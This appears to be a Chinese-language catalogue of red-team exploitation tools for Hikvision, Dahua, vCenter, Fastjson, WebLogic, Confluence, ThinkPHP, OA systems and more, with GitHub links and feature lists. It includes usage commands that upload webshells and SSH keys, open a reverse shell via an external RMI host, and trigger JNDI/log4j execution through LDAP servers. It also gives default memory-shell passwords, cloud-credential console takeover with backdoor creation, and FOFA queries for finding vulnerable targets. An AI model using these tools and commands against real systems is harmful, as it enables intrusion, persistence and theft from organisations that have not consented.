目录
红队武器库漏洞利用工具合集整理,解压密码:LightDream
海康威视Hikvision综合漏洞利用工具
大华Dahua综合漏洞利用工具
Nacos综合漏洞利用工具
Vcenter综合漏洞利用工具
Fastjson漏洞批量检测工具
Jenkins综合漏洞利用工具
Struts2全版本漏洞检测工具
Thinkphp综合漏洞利用工具
Spring综合漏洞利用工具
Shiro反序列化漏洞综合利用工具
若依RuoYi综合漏洞利用工具
Xxl-job漏洞利用工具
Jboss综合漏洞利用工具
Weblogic综合漏洞利用工具
Tomcat综合漏洞利用工具
帆软反序列化漏洞利用工具
云资产AK-SK利用管理工具
Confluence综合漏洞利用工具
数据库综合利用工具
DecryptTools综合加解密后渗透工具
互联网厂商API利用工具
OA综合漏洞利用工具
信息泄露利用工具
Swagger API信息泄露利用工具
Heapdump敏感信息提取工具
.git泄漏利用工具
SVN源代码利用工具
.DS_Store文件泄露利用工具
.cvs源代码泄露利用工具
Jeecg-Boot综合漏洞利用工具
Webpack:安全检测的扫描工具
Jeecg-Boot综合漏洞利用工具
项目地址
https://github.com/MInggongK/jeecg-
项目介绍
Jeecg综合漏洞利用工具集成了多模块漏洞利用,包括一键漏洞检测,单独选择模块检测,cmdshell模块,文件上传模块,批量检测模块等 v3.0版本内置的标准库外,在检测模块加入了okhttp的三方库,支持https网站检测,以及优化了基于jeecg queryUser漏洞的接口测试
一键检测模块,选择模块
jeecg-boot queryFieldBySql远程命令执行漏洞
jeecg-boot testConnection远程命令执行漏洞
JeecgBoot jmreport/loadTableData SSTI模板注入漏洞
jeecg-boot-queryTableData-sqli注入漏洞
jeecg-boot-getDictItemsByTable-sqli注入漏洞
Jeecg-Boot qurestSql-SQL注入漏洞
jeecg-boot commonController 任意文件上传漏洞
jeecg-boot jmreport任意文件上传漏洞
jeecg-boot-querySysUser信息泄露漏洞
jeecg-boot-checkOnlyUser信息泄露漏洞
jeecg-boot-httptrace信息泄露漏洞
接口测试模块:
jeecg-boot-querySysUser信息泄露漏洞
jeecg-boot-checkOnlyUser信息泄露漏洞
cmdshell模块:
jeecg-boot queryFieldBySql远程命令执行漏洞
jeecg-boot testConnection远程命令执行漏洞
JeecgBoot jmreport/loadTableData SSTI模板注入漏洞
文件上传模块:
jeecg-boot commonController 任意文件上传漏洞
jeecg-boot jmreport任意文件上传漏洞
批量检测模块:
jeecg-boot queryFieldBySql远程命令执行漏洞
jeecg-boot testConnection远程命令执行漏洞
JeecgBoot jmreport/loadTableData SSTI模板注入漏洞
jeecg-boot-queryTableData-sqli注入漏洞
jeecg-boot-getDictItemsByTable-sqli注入漏洞
Jeecg-Boot qurestSql-SQL注入漏洞
海康威视 Hikvision 综合漏洞利用工具
项目地址
https://github.com/MInggongK/Hikvision-
项目介绍
海康威视综合漏洞利用工具 收录漏洞如下:
Hikvision 摄像头未授权访问漏洞
Hikvision 远程代码执行漏洞
Hikvision iVMS综合安防系统任意文件上传漏洞
Hikvision综合安防管理平台isecure center文件上传漏洞
Hikvision综合安防管理平台config信息泄露漏洞
Hikvision综合安防管理平台env信息泄漏漏洞
Hikvision综合安防管理平台report任意文件上传漏洞
Hikvision综合安防管理平台api session命令执行漏洞
Hikvision applyCT命令执行漏洞
Hikvision applyAutoLoginTicket命令执行漏洞
Hikvision keepAlive远程代码执行漏洞
Hikvision综合安防管理平台orgManage任意文件读取漏洞
Hikvision综合安防管理平台files任意文件读取漏洞
Dahua 综合漏洞利用工具
项目地址
https://github.com/MInggongK/dahuaExploitGUI
项目介绍
Dhua综合漏洞利用工具 收录漏洞如下:
大华DSS数字监控系统attachment_clearTempFile.action注入漏洞
大华DSS数字监控系统远程命令执行漏洞
大华DSS数字监控系统itcBulletin注入漏洞
大华智慧园区综合管理平台信息泄露漏洞
大华智慧园区综合管理平台getNewStaypointDetailQuery注入漏洞
大华智慧园区综合管理平台clientserver注入
大华DSS user_edit.action信息泄露漏洞
大华智慧园区综合管理平台poi任意文件上传漏洞
大华智慧园区综合管理平台video任意文件上传漏洞
大华智慧园区综合管理平台emap任意文件上传漏洞
大华智慧园区综合管理平台searchJson注入漏洞
大华DSS数字监控系统attachment_getAttList.action注入漏洞
大华智能物联综合管理平台justForTest用户登录漏洞
大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞
大华智慧园区综合管理平台deleteFtp远程命令执行漏洞
大华EIMS-capture_handle远程命令执行漏洞
大华智能物联综合管理平台random远程命令执行漏洞
大华智慧园区综合管理平台ipms命令执行漏洞
Nacos 综合漏洞利用工具
项目地址
https://github.com/charonlight/NacosExploitGUI
项目介绍
集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用
Vcenter 综合漏洞利用工具
项目地址
https://github.com/Schira4396/VcenterKiller
https://github.com/W01fh4cker/VcenterKit
项目介绍
一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接
go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 //get cookie
./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit包含
信息收集模块
CVE-2021-21972模块
CVE-2021-21985模块
CVE-2021-22005模块
CVE-2022-22954模块
CVE-2022-22972模块
后渗透利用模块
渗透测试记事本(打vcenter的时候常用的命令、常看的文章)
Fastjson 漏洞批量检测工具
项目地址
https://github.com/c0ny1/FastjsonExploit
https://github.com/smallfox233/JsonExp
项目介绍
FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:
一键生成利用payload,并启动所有利用环境。
管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)
.---- -. -. . . .
( .',----- - - ' '
\_/ ;--:-\ __--------------------__
__U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| |
c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
,_\___________'_|,L______],|______________________|
/;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o)
FastjsonExploit is a Fastjson library vulnerability exploit framework
Author:c0ny1<root@gv7.me>
Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"
Available payload types:
Payload PayloadType VulVersion Dependencies
------- ----------- ---------- ------------
BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4
JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass
JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass
JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass
JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass
JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0
SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE
TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
1. 根据现有payload,检测目标是否存在fastjson或jackson漏洞(工具仅用于检测漏洞、定位payload)
2. 若存在漏洞,可根据对应payload进行后渗透利用
3. 若出现新的漏洞时,可将最新的payload新增至txt中(需修改格式)
4. 工具无法完全替代手工检测,仅作为辅助工具使用
JsonExp.exe -h
usage: -u [目标] -l [LDAP地址]
usage: -uf [url.txt] -l [LDAP地址]
usage: -req [request.txt] -l [LDAP地址]
[-h] [-uf URLFILE] [-u URL] [-req REQUEST] [-to TIMEOUT] [-f FILE] [-t TYPE] [-c COOKIE] [-l LDAP] [-r RMI]
[-pro PROTOCOL] [-proxy PROXY]
功能:批量检测是否存在fastjson/jackson漏洞(未使用-f时,默认检测fastjson)
optional arguments:
-h, --help show this help message and exit
-uf URLFILE, --urlfile URLFILE
[可选] 指定批量目标(文本路径)
-u URL, --url URL [可选] 指定目标
-req REQUEST, --request REQUEST
[可选] 指定请求包,默认为http协议发送请求
-to TIMEOUT, --timeout TIMEOUT
[非必须] 指定请求超时时长,默认为5秒
-f FILE, --file FILE [非必须] 指定payload(文本路径),默认为template/fastjson.txt
-t TYPE, --type TYPE [非必须] 指定请求类型为get或post,默认为post
-c COOKIE, --cookie COOKIE
[非必须] 设置cookie值,默认为空
-l LDAP, --ldap LDAP [可选] 指定ldap地址,ip:端口/路径 或 域名:端口/路径
-r RMI, --rmi RMI [可选] 指定rmi地址,ip:端口 或 域名:端口
-pro PROTOCOL, --protocol PROTOCOL
[可选] 指定请求包的协议类型,需结合-req参数使用,默认为http
-proxy PROXY, --proxy PROXY
[可选] 设置代理,例:--proxy http://127.0.0.1:8080
Jenkins 综合漏洞利用工具
项目地址
https://github.com/TheBeastofwar/JenkinsExploit-GUI
项目介绍
支持检测:
CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1
CVE-2016-0792 Jenkins XStream反序列化远程代码执行 https://github.com/jpiechowka/jenkins-cve-2016-0792
CVE-2017-1000353 Jenkins-CI 远程代码执行漏洞 https://github.com/vulhub/CVE-2017-1000353
CVE-2018-1000600 Jenkins GitHub SSRF+信息泄露
CVE-2018-1000861 Jenkins 绕过Groovy沙盒未授权命令执行漏洞 https://github.com/orangetw/awesome-jenkins-rce-2019
CVE-2018-1999002 Jenkins 任意文件读取 https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w
CVE-2019-1003000 Jenkins 远程代码执行 https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
CVE-2019-1003005/CVE-2019-1003029 远程代码执行(Script Security Plugin沙箱绕过) https://github.com/orangetw/awesome-jenkins-rce-2019
CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897
Struts2 全版本漏洞检测工具
项目地址
https://github.com/abc123info/Struts2VulsScanTools
项目介绍
1、点击“检测漏洞”,会自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021、S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。
2、“批量验证”,(为防止批量geshell,此功能已经删除,并不再开发)。
3、S2-020、S2-021仅提供漏洞扫描功能,因漏洞利用exp很大几率造成网站访问异常,本程序暂不提供。
4、对于需要登录的页面,请勾选“设置全局Cookie值”,并填好相应的Cookie,程序每次发包都会带上Cookie。
5、作者对不同的struts2漏洞测试语句做了大量修改,执行命令、上传功能已经能通用。
6、支持GET、POST、UPLOAD三种请求方法,您可以自由选择。(UPLOAD为Multi-Part方式提交)
7、部分漏洞测试支持UTF-8、GB2312、GBK编码转换。
8、每次操作都启用一个线程,防止界面卡死。
Thinkphp 综合漏洞利用工具
项目地址
https://github.com/Lotus6/ThinkphpGUI
https://github.com/bewhale/thinkphp_gui_tools
项目介绍
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
支持版本:(检查,命令执行,getshell)
ThinkPHP 5.0 RCE
ThinkPHP 5.0.10 RCE
ThinkPHP 5.0.22/5.1.29 RCE
ThinkPHP 5.0.23 RCE
ThinkPHP 5.0.24-5.1.30 RCE
ThinkPHP 3.x RCE
ThinkPHP 5.x 数据库信息泄露
ThinkPHP5.x日志泄露
ThinkPHP3.x日志泄露
ThinkPHP 3.x 日志包含RCE
Thinkphp6.x日志泄漏
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
支持大部分ThinkPHP漏洞检测,整合20多个payload
支持部分漏洞执行命令
支持单一漏洞批量检测
支持TP3和TP5自定义路径日志遍历
支持部分漏洞一键GetShell
支持设置代理和UA
Spring 综合漏洞利用工具
项目地址
https://github.com/charonlight/SpringExploitGUI
https://github.com/0x727/SpringBootExploit
项目介绍
工具目前支持
Spring Cloud Gateway RCE(CVE-2022-22947)
Spring Cloud Function SpEL RCE (CVE-2022-22963)
Spring Framework RCE (CVE-2022-22965)
Spring Data Commons RCE (CVE-2018-1273)的检测以及利用
实现heapdump解密功能,并且支持模糊查询
SpringBootExploit
一款针对SpringBootEnv页面进行快速漏洞利用
SnakeYAMLRCE
SpELRCE
EurekaXstreamRCE
JolokiaLogbackRCE
JolokiaRealmRCE
H2DatabaseConsoleJNDIRCE
SpringCloudGatewayRCE
Shiro 反序列化漏洞综合利用工具
项目地址
https://github.com/SummerSec/ShiroAttack2
https://github.com/sma11new/Pyke-Shiro
项目介绍
ShiroAttack2shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack
javafx
处理没有第三方依赖的情况
支持多版本CommonsBeanutils的gadget
支持内存马
采用直接回显执行命令
添加了更多的CommonsBeanutils版本gadget
支持修改rememberMe关键词
支持直接爆破利用gadget和key
支持代理
添加修改shirokey功能(使用内存马的方式)可能导致业务异常
支持内存马小马
添加DFS算法回显(AllECHO)
支持自定义请求头,格式:abc:123&&&test:123
Pyke-Shiro:复杂请求下的Shiro反序列化利用工具
复杂请求可以是GET或POST,所有请求信息会被携带,可指定https,同时可选择是否保留原始数据包中的Cookie内容
假设前台输入的cookieFlag是rememberMe
复杂请求下如果勾选保留Cookie,两种情况:
一、请求包中有cookie,两种情况:
1、原始cookie内容中包含rememberMe,两种情况:
a)原始cookie只有rememberMe一项,则无需保留,直接返回cookie payload
b)原始cookie除了rememberMe还有其他项,则需要保留其它项,添加rememberMe的值为cookie payload
2、原始cookie中不包含rememberMe,直接拼接cookie payload即可
二、请求包中没cookie,不存在需要保留的内容,直接返回cookie payload
若依 RuoYi 综合漏洞利用工具
项目地址
Ruoyi-All-1.0-SNAPSHOT这个工具是一个大佬写的没放github上,需要的可以去原作者公众号:小黑说安全,获取
https://mp.weixin.qq.com/s/HU1OqZ7YFGjfc4HE3M8tPA
https://github.com/charonlight/RuoYiExploitGUI
项目介绍
RuoYiExploitGUI_v1.0
若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具, 扫描和漏洞利用结束会自行删除所创建的定时任务。
Xxl-job漏洞利用工具
项目地址
https://github.com/charonlight/xxl-jobExploitGUI
项目介绍
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。
Jboss 综合漏洞利用工具
项目地址
jbosss综合利用工具by:小黑
同样与上面Ruoyi-All-1.0-SNAPSHOT RuoYi综合漏洞利用工具出自同一个作者
https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ
https://github.com/fupinglee/JavaTools/tree/master/JBoss
项目介绍
JBoss相关漏洞的验证工具,包括有CVE-2006-5750,CVE-2007-1036,CVE-2010-0738,CVE-2010-1871,CVE-2013-4810,CVE-2015-7501,CVE-2017-7504,CVE-2017-12149等漏洞。
CVE-2010-1871,CVE-2013-4810,CVE-2015-7501,CVE-2017-7504,CVE-2017-12149可以执行命令。
Weblogic 综合漏洞利用工具
项目地址
https://github.com/KimJun1010/WeblogicTool
WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等
CVE-2023-21931(JNDI)
CVE-2023-21839(JNDI)
CVE-2020-2551(JRMP)
CVE-2020-2551
CVE-2020-2555
CVE-2020-2883
CVE-2020-14882 未授权访问
CVE-2018-2894
CVE-2018-2628(JRMP)
CVE-2018-2893(JRMP)
CVE-2018-3245(JRMP)
CVE_2018_3252(JRMP)
CVE_2018_3191
CVE-2016-3510
CVE-2016-0638
CVE-2017-10271
CVE-2017-3248(JRMP)
CVE-2015-4852
......
Tomcat 综合漏洞利用工具
项目地址
https://github.com/tpt11fb/AttackTomcat
https://github.com/errors11/TomcatVuln
AttackTomcat
检测漏洞清单
CVE-2017-12615 PUT文件上传漏洞 tomcat-pass-getshell 弱认证部署war包 弱口令爆破 CVE-2020-1938 Tomcat 文件读取/包含
帆软反序列化漏洞利用工具
项目地址
https://github.com/yecp181/Frchannel
https://github.com/BambiZombie/FrchannelPlus
项目介绍
1. 本工具仅用于本地模拟环境测试, 适用于FineBI
2. 漏洞路径: /webroot/decision/remote/design/channel
3. 本工具支持jackson、hibernate、cb反序列化链来进行回显与注入内存马
4. 利用DNSLOG功能时在输入命令处输入例如:blo6bz.dnslog.cn
帆软bi反序列化漏洞利用工具PLUS,将原版的冰蝎内存马换成了哥斯拉,增加了suo5内存马
云资产 AK-SK 利用管理工具
项目地址
https://github.com/dark-kingA/cloudTools
项目介绍
云资产管理工具 目前工具定位是云安全相关工具,目前是两个模块 云存储工具、云服务工具,
云存储工具主要是针对oss存储、查看、删除、上传、下载、预览等等
云服务工具主要是针对rds、服务器的管理,查看、执行命令、接管等等
阿里云:接管控制台、取消接管、Oss增删改查、远程命令执行回显、历史命令记录查看、子用户列表、云数据库管理、告警管理
腾讯云:接管控制台、取消接管、Oss增删改查、远程命令执行回显、子用户列表
华为云:接管控制台、取消接管、子用户列表
ucloud:接管控制台、主机查询、子用户列表查看、主用户查看、订单查看
AWS: 接管控制台、创建后门、子用户列表、策略列表 后门信息
Confluence 综合漏洞利用工具
项目地址
https://github.com/Lotus6/ConfluenceMemshell
项目介绍
ConfluenceMemshell
Confluence CVE 2021,2022,2023 利用工具,支持命令执行,哥斯拉,冰蝎 内存马注入
支持 Confluence 版本:CVE-2021-26084,CVE-2022-26134,CVE_2023_22515,CVE-2023-22527
(如果对您有帮助,感觉不错的话,请您给个大大的 ⭐️❗️)
哥斯拉默认密码:pass ,默认key:key ,请求配置 - 协议头 需加上 Connection: close
冰蝎默认密码:rebeyond,默认UA:Accept-Language:zh-CN,zh;q=0.95,n-AS,fr-RF
只有 CVE-2022-26134 版本支持哥斯拉,冰蝎自定义密码,其他版本都是默认密码
V1.1版本
新增 CVE_2023_22515,用户创建,内存马注入,基于 CmdShell 的命令执行
table 双击复制当前行,shell路径,key,ua
哥斯拉 memshell 地址:url+/plugins/servlet/com/atlassian/TeamManageServlet
哥斯拉默认密码:pass ,默认key:key ,请求配置 - 协议头 需加上 Connection: close
CmdShell 地址:url+/plugins/servlet/com/atlassian/TeamManageServlet?team=whoami
数据库综合利用工具
项目地址
https://github.com/SafeGroceryStore/MDUT
https://github.com/team-ide/teamide
项目介绍
MDUT(Multiple Database Utilization Tools)是中国一款集成了多种主流数据库类型的跨平台数据库利用工具。
在前身SQLTOOLS的基础上,开发了该程序(向SQLTOOLS致敬),旨在将常见的数据库利用方法集成到一个程序中,打破了各种数据库利用工具需要各种环境并造成相当不便的障碍。
此外,该工具使用JAVAFx作为GUI操作界面,美观。
同时,该程序还支持多个数据库同时运行,每个数据库都是相互独立的,这极大地方便了网络安全工作者的使用。
Team IDE 集成MySql、Oracle、金仓、达梦、神通等数据库、SSH、FTP、Redis、Zookeeper、Kafka、Elasticsearch、Mongodb、小工具等管理工具
Team · IDE 功能模块
终端
配置SSH连接,连接远程服务器 完成
SSH支持rz、sz命令,rz支持批量上传 完成
支持本地终端 完成
支持节点终端 完成
Zookeeper
支持单机、集群,增删改查等操作,批量删除等 完成
Kafka
对Kafka主题增删改查等操作 完成
选择主题,推送、消费、删除数据等 完成
Redis
Redis Key搜索、模糊查询、删除、新增等 完成
字符串、哈希、列表、集合值编辑 完成
Elasticsearch
索引增删改查等操作 完成
选择索引,增删改查数据等 完成
添加索引,设置字段,索引迁移等 完成
Database
数据库库|用户|模式列表、表数据加载 完成
数据库库表数据增删改查、批量新增、修改、删除等操作 完成
表格选择数据导出SQL(新增、修改、删除数据SQL)等操作 完成
自定义SQL执行面板,结果查看器 完成
新建库,在线设计表,查看建表、更新表SQL语句 完成
支持数据库,MySql、Oracle、达梦、金仓、神通、Sqlite、ODBC等数据库 完成
节点
可以配置多服务器之间网络透传,内外网相互透传等 完成
小工具
JSON、Yaml转换 完成
时间长转换 完成
Base64、MD5等 完成
二维码生成 完成
Thrift
添加thrift模块,配置thrift文件目录 完成
展示所有thrift服务、方法等 完成
双击方法运行测试 完成
性能测试,测试报告,图表展示TPS、AVG、Min、Max、T90、T99等 完成
SSH隧道
Mysql、Redis、Zookeeper支持SSH隧道连接,选择SSH后,填写127.0.0.1则连接到SSH本地相应资源 完成
Mongodb
库管理 完成
集合管理 完成
集合索引编辑 完成
集合数据查询、新增、修改、删除 完成
DecryptTools 综合加解密后渗透工具
项目地址
https://github.com/wafinfo/DecryptTools
DecryptTools综合解密
一款针对加解密综合利用后渗透工具
工具展示
支持22种加解密+密码查询功能
万户OA
用友NC
金蝶EAS
蓝凌OA
致远OA
宏景ERP
湖南强智
金和jc6 瑞友天翼
金和C6 Navicat
华天动力 FinalShell
亿赛通
帆软报表
H3C CAS
Weblogic
金蝶云星空
新华三IMC
金盘 OPAC
海康威视IVMS 8700
海康威视IP Camera
海康威视综合安防平台(iSecure) (支持全平台)
JBOSS
SpringEnc
Druid
密码查询功能
互联网厂商 API 利用工具
项目地址
https://github.com/pykiller/API-T00L
https://github.com/mrknow001/API-Explorer
针对互联网各大API泄露的利用工具,包含钉钉、企业微信、飞书等
工具初衷是做一个小程序、公众号、企业微信、飞书、钉钉等泄露secert后利用工具,后来发现几家接口有一定区别,认证等参数分布在不同位置,索性就做成一个比较通用的工具了。目前可以定义:请求类型、url、header、body、正则提取认证token、接口参数说明。
API-Explorer是一款管理api接口的工具,可提前配置好接口,直接调用即可;可定义数据包任何位置内容,使用起来相当灵活。
应用 功能 数据库接口
微信公众号 支持 完成部分常用功能
微信小程序 支持 完成部分常用功能
企业微信 支持 完成部分常用功能
钉钉 理论支持 无
飞书 支持 完成部分常用功能
腾讯地图 支持 完成部分常用功能
高德地图 支持 完成部分常用功能
百度地图 支持 完成部分常用功能
钉钉无测试接口,写了也不知道效果,所以目前没有写。
OA 综合漏洞利用工具
项目地址
https://github.com/R4gd0ll/I-Wanna-Get-All
https://github.com/achuna33/MYExploit
https://mp.weixin.qq.com/s/1MEkYv5A47DJLCKqXKT0zQ
https://github.com/xiaokp7/TongdaOATool
项目介绍
介绍
目前集成288漏洞,包括nday、1day(未公开poc)
java环境 java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)
基于Apt-T00ls二次开发工具,I Wanna Get All 安全工具, 严禁一切未授权漏洞扫描攻击
使用工具或文章转发用于其他途径,请备注作者及工具地址来源。
使用工具前建议判断系统指纹框架,部分漏洞为接口探测存活判断是否成功,实际利用情况以执行情况为准
1. 用友serial漏洞大部分为接口探测,请ATT根据实际情况进行判断
2. 部分漏洞为确保准确性,请先进行检测,再进行点击执行利用
3. 使用ALL进行漏洞探测时,由于多线程等其他原因会产生误报
4. 文件上传漏洞,上传文件后执行进行上传,并使CMD栏为空,请先检测尝试上传后再利用
5. 命令执行漏洞利用CMD写入命令后进行执行。
6. 清屏按钮可清除除URL地址外所有信息
7. 根据执行结果提示并选择其他模块利用
8. POC模块目前集成poc情况共近230余个,包含至今HVV、goby纰漏漏洞(因poc集中管理可能出现误报,请配置代理抓包判断),如下:
(1).用友NC&反序列化接口----------------------------------fofa:title="YONYOU NC"
(2).用友GRP--------------------------------------------fofa:app="yonyou-GRP-U8"
(3).用友NCCloud----------------------------------------fofa:body="nccloud"
(4).用友tplus------------------------------------------fofa:app="畅捷通-TPlus"
(5).用友U8C--------------------------------------------fofa:app="用友-U8-Cloud"
(6).用友ufida------------------------------------------fofa:body="ufida.ico"
(7).泛微Ecology----------------------------------------fofa:app="泛微-协同办公OA"
(8).泛微Emobile----------------------------------------fofa:title="移动管理平台-企业管理"
(9).泛微Eoffice----------------------------------------fofa:app="泛微-EOffice"
(10).蓝凌OA--------------------------------------------fofa:app="Landray-OA系统"
(11).蓝凌EIS-------------------------------------------fofa:app="Landray-EIS智慧协同平台"
(12).万户OA--------------------------------------------fofa:body="/defaultroot/"
(13).致远A6A8------------------------------------------fofa:app="致远互联-OA"
(14).致远MServer---------------------------------------fofa:body="/mobile_portal/"
(15).致远yyoa------------------------------------------fofa:body="yyoa" && app="致远互联-OA"
(16).通达OA--------------------------------------------fofa:app="TDXK-通达OA"
(17).帆软组件-------------------------------------------fofa:"Powered by 帆软"
(18).金蝶Apusic----------------------------------------fofa:header="Apusic"
(19).金蝶EAS-------------------------------------------fofa:app="Kingdee-EAS"
(20).金蝶云OA------------------------------------------fofa:app="金蝶云星空-管理中心"
(21).金和OA--------------------------------------------fofa:app="金和网络-金和OA"
(22).红帆OA--------------------------------------------fofa:app="红帆-ioffice"
(23).宏景HCM--------------------------------------------fofa:app="HJSOFT-HCM"
(24).亿赛通---------------------------------------------fofa:app="亿赛通-电子文档安全管理系统"
(23).飞企互联-------------------------------------------fofa:app="FE-协作平台"
MemShell模块
1. 支持冰蝎3.0、哥斯拉、蚁剑、suo5、cmdecho、neoReGeorg、自定义内存马
2. 支持输出源码、Base64、hex、gzip格式payload
3. 用友NC反序列化 集成接口反序列化(测试环境)
4. 用友U8C反序列化 集接口反序列化(测试环境)
5. 亿赛通XStream反序列化 集接口反序列化(测试环境)
6. 用友NC内存马支持bypass脏数据传入,默认为100字节
该工具获取请关注原作者公众号:琴音安全
信息泄露利用工具
Swagger API 信息泄露利用工具
项目地址
https://github.com/jayus0821/swagger-hack
https://github.com/lijiejie/swagger-exp
Swagger-hack 2.0
自动化爬取并自动测试所有swagger接口
第一个版本仅适配了一个版本的swagger,不同版本见差距比较大,后续又调查了很多版本的swagger,将脚本的适配性增强了很多
优化:
适配多个版本swagger
添加多进程
增强了程序的健壮性
优化了控制台显示,生成日志文件
Swagger API Exploit 1.2
这是一个 Swagger REST API 信息泄露利用工具。 主要功能有:
遍历所有API接口,自动填充参数
尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接口是否可以未授权访问利用
分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞
检测 API认证绕过漏洞
在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用
使用Chrome打开本地Web服务器,并禁用CORS,解决部分API接口无法跨域请求的问题
当工具检测到HTTP认证绕过漏洞时,本地服务器拦截API文档,修改path,以便直接在Swagger UI中进行测试
Heapdump敏感信息提取工具
项目地址
https://github.com/whwlsfb/JDumpSpider
https://github.com/wyzxxz/heapdump_tool
项目介绍
JDumpSpider
HeapDump敏感信息提取工具
暂支持提取以下类型的敏感信息
数据源
SpringDataSourceProperties
WeblogicDataSourceConnectionPoolConfig
MongoClient
AliDruidDataSourceWrapper
HikariDataSource
配置文件信息
MapPropertySource
OriginTrackedMapPropertySource
MutablePropertySource
ConsulPropertySource
OSS(模糊搜索)
Redis配置
RedisStandaloneConfiguration
JedisClient
ShiroKey
CookieRememberMeManager
模糊搜索用户信息
UserPassSearcher01
$ java -jar .\target\JDumpSpider-1.0-SNAPSHOT-full.jar
Missing required parameter: '<heapfile>'
Usage: JDumpSpider [-hV] <heapfile>
Extract sensitive information from heapdump file.
<heapfile> Heap file path.
-h, --help Show this help message and exit.
-V, --version Print version information and exit.
.git 泄漏利用工具
项目地址
https://github.com/BugScanTeam/GitHack
项目介绍
GitHack
.git 泄漏利用工具,可还原历史版本
依赖
不需要安装其它 Python 库,只需要有 git 命令
git
ubuntu/debian: $ apt-get install git
redhat/centos: $ yum install git
windows git-for-windows下载
使用前需确保 git 在 环境变量中
使用方法
python GitHack.py http://www.example.com/.git/
还原后的文件在 dist/ 目录下
工作流程
尝试获取 packs克隆
尝试目录遍历克隆
尝试从缓存文件(index)、commit记录中恢复
SVN源代码利用工具
项目地址
https://github.com/admintony/svnExploit
项目介绍
SvnExploit是一款SVN源代码利用工具,其完美支持SVN<1.7版本和SVN>1.7版本的SVN源代码泄露
python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/
____ _____ _ _ _
/ ___|_ ___ __ | ____|_ ___ __ | | ___ (_) |_
\___ \ \ / / '_ \| _| \ \/ / '_ \| |/ _ \| | __|
___) \ V /| | | | |___ > <| |_) | | (_) | | |_
|____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__|
|_|
SvnExploit - Dump the source code by svn
Author: AdminTony (http://admintony.com)
https://github.com/admintony/svnExploit
